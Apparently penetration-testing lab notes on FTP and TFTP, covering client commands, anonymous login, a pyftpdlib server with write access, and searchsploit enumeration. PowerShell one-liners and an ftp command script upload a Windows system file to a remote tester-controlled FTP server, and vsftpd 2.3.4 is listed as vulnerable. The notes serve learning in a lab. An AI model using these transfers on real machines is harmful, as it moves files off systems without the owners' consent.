FTP

File Transfer Protocol

  • Uses Port 20 for Data and Port 21 for Commands.

  • It can use UDP over Port 69 for TFTP.

  • Always check for anonymous login being enabled.

Basic Commands
  • Start the service:

ftp <IP>
  • To login as any other user:

USER <user>
  • To specify a password:

PASS <password>
  • Download a file:

get <file>
  • Upload a file:

put <file_path> <destination_path>
  • Passive mode:

passive
  • Change the local directory for downloads:

lcd /home/<your-username>
  • Exit the session:

quit
  • Transferring files using powershell:

(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')
  • Upload a file using powershell

PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
  • If anonymous login is enabled, use curl:

curl -O ftp://<server-address>/path/to/file
TFTP

This is the default config file for TFTP --> tftpd-hpa

Start the service
tftp <IP>
  • Uses binary mode for non-text files:

mode binary
  • Uses ASCII mode for text files:

mode ascii
  • To look for files in the TFTP root:

find / -name file.txt
Enumeration
  • Is always good practice to look for vulnerabilities:

searchsploit <version>
  • Always check where you land:

pwd
  • List directories:

dir
Set a Python Server
  • First, Install the Python module:

sudo pip3 install pyftpdlib
  • Then, set the server:

sudo python3 -m pyftpdlib --port 21
  • By default, pyftpdlib uses Port 2121 and anonymous authentication is enabled by default if we don't set a user and password.

Allow write permissions
sudo python3 -m pyftpdlib --port 21 --write
Create a command file
  • Is possible to create command files and execute then using the -s flag:

ftp -v -n -s:ftpcommand.txt
  • Copy this in to a file to create a script that will download a file:

open 192.168.49.128
USER anonymous
binary
GET file.txt
bye
  • Copy this in to a file to create a script that will upload a file to the server:

open 192.168.49.128
USER anonymous
binary
PUT c:\windows\system32\drivers\etc\hosts
bye
Vulnerabilities

vsftpd 2.3.4

Last updated